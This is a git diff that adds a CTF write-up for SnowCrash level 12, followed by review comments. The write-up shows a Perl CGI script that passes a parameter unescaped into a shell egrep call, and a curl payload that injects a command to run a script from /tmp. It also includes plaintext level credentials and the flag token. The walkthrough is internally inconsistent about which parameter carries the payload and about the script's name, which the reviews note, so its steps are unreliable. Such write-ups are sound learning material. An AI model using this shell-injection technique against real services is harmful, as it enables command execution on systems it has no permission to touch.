diff --git a/levels/12/README.md b/levels/12/README.md new file mode 100644 index 0000000..2ea1d15 --- /dev/null +++ b/levels/12/README.md 
@@ -0,0 +1,117 @@ +# Level 12 + +## how to login + +username: level12 + +password: fa6v5ateaw21peobuub8ipe6s + +## Goal + +run `getflag` as user `flag12` + +## Actually doing something + +```bash +level12@SnowCrash:~$ ll +total 16 +dr-xr-x---+ 1 level12 level12 120 Mar 5 2016 ./ +d--x--x--x 1 root users 340 Aug 30 2015 ../ +-r-x------ 1 level12 level12 220 Apr 3 2012 .bash_logout* +-r-x------ 1 level12 level12 3518 Aug 30 2015 .bashrc* +-rwsr-sr-x+ 1 flag12 level12 464 Mar 5 2016 level12.pl* +-r-x------ 1 level12 level12 675 Apr 3 2012 .profile* +``` + +Perl again... + +```perl +level12@SnowCrash:~$ cat level12.pl +#!/usr/bin/env perl +# localhost:4646 +use CGI qw{param}; +print "Content-type: text/html\n\n"; + +sub t { + $nn = $_[1]; + $xx = $_[0]; + $xx =~ tr/a-z/A-Z/; + $xx =~ s/\s.*//; + @output = `egrep "^$xx" /tmp/xd 2>&1`; + foreach $line (@output) { + ($f, $s) = split(/:/, $line); + if($s =~ $nn) { + return 1; + } + } + return 0; +} + +sub n { + if($_[0] == 1) { + print(".."); + } else { + print("."); + } +} + +n(t(param("x"), param("y"))); +``` +a bit more involed, lets try to make it more pretty + +```perl +#!/usr/bin/env perl +# localhost:4646 +use CGI qw{param}; +print "Content-type: text/html\n\n"; + +sub t { + $arg2 = $_[1]; + $arg1 = $_[0]; + $arg1 =~ tr/a-z/A-Z/; + $arg1 =~ s/\s.*//; + @output = `egrep "^$arg1" /tmp/xd 2>&1`; + foreach $line (@output) { + ($f, $s) = split(/:/, $line); + if($s =~ $arg2) { + return 1; + } + } + return 0; +} + +sub n { + if($_[0] == 1) { + print(".."); + } else { + print("."); + } +} + +n(t(param("x"), param("y"))); +``` + +when looking at this, we basically spot an `egrep` meaning that we have a shell injection. 
+ +lets look at what is given to this string + +first of all, we get called with two argument, lets call them by their http parameter names `x` and `y` + +in the script they are also named `arg1` for `x` and `arg2` for `y` + +arg2 doesn't matter for us, so lets ignore it + +arg1 is converted to uppercase, and then we only keep erverything up to the first space; + +so we want to execute something like last time, meaning that we want to instert something to stop the current comment +`";cmdhere` + +but the issue is that we need to have a command in uppercase (because everuthing gets convert to uppercase), however the only directory we can write to is `/tmp` which is in lowercase... + +Alas this doesnt matter since we are in shell land, and we can say `/*/GETOK` to refer to the `/tmp/GETOK` script + +```bash +level12@SnowCrash:~$ curl "localhost:4646?y=%22%3B/*/GETTOK%3B%22" && cat /tmp/flag +..Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr +``` + diff --git a/levels/12/flag b/levels/12/flag new file mode 100644 index 0000000..29e9492 --- /dev/null +++ b/levels/12/flag @@ -0,0 +1 @@ +g1qKMiRpXf53AWhDaU7FEkczr diff --git a/levels/12/passwd b/levels/12/passwd new file mode 100644 index 0000000..54ea557 --- /dev/null +++ b/levels/12/passwd @@ -0,0 +1 @@ +fa6v5ateaw21peobuub8ipe6s
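Review bot: the walkthrough in `levels/12/README.md` is internally inconsistent about which parameter is injected and what the helper is called, so a reader cannot follow it as written. The prose says `x` becomes `arg1`, is uppercased, and is the value interpolated into the backtick `egrep` command, while `y`/`arg2` "doesn't matter for us"; yet the final command passes the payload in `y` (`curl "localhost:4646?y=..."`). The prose also refers to `/tmp/GETOK` but the command uses `GETTOK`, and the README never shows where `/tmp/flag` comes from, so the `cat /tmp/flag` step is not reproducible from the text. Please make the prose and the command agree and document the missing step. It would also help to name the root cause precisely from the code side: `$arg1` is interpolated unescaped into a shell command line, and `tr/a-z/A-Z/` plus `s/\s.*//` are transformations, not sanitisation; the defensive fix is to avoid the shell entirely (list-form `open`/`system` with `egrep` and the pattern as separate arguments) and to reject any `x` that does not match an expected character class. Minor wording: "involed" should be "involved", "instert" "insert", "erverything"/"everuthing" "everything", "doesnt" "doesn't", and "stop the current comment" should read "command".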
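Review bot: `levels/12/flag` is a second copy of the token that the README already prints in its final `curl` output; two copies of the same value can drift. Either have the README reference this file or keep only one of them.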
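Review bot: `levels/12/passwd` duplicates the password given in the README's "how to login" section, with the same drift risk as the flag file. Committing credentials in plaintext is only acceptable here because they are fixed, published CTF VM credentials; a one-line note to that effect (in this README or the repository's top-level one) would keep the pattern from being copied for real secrets.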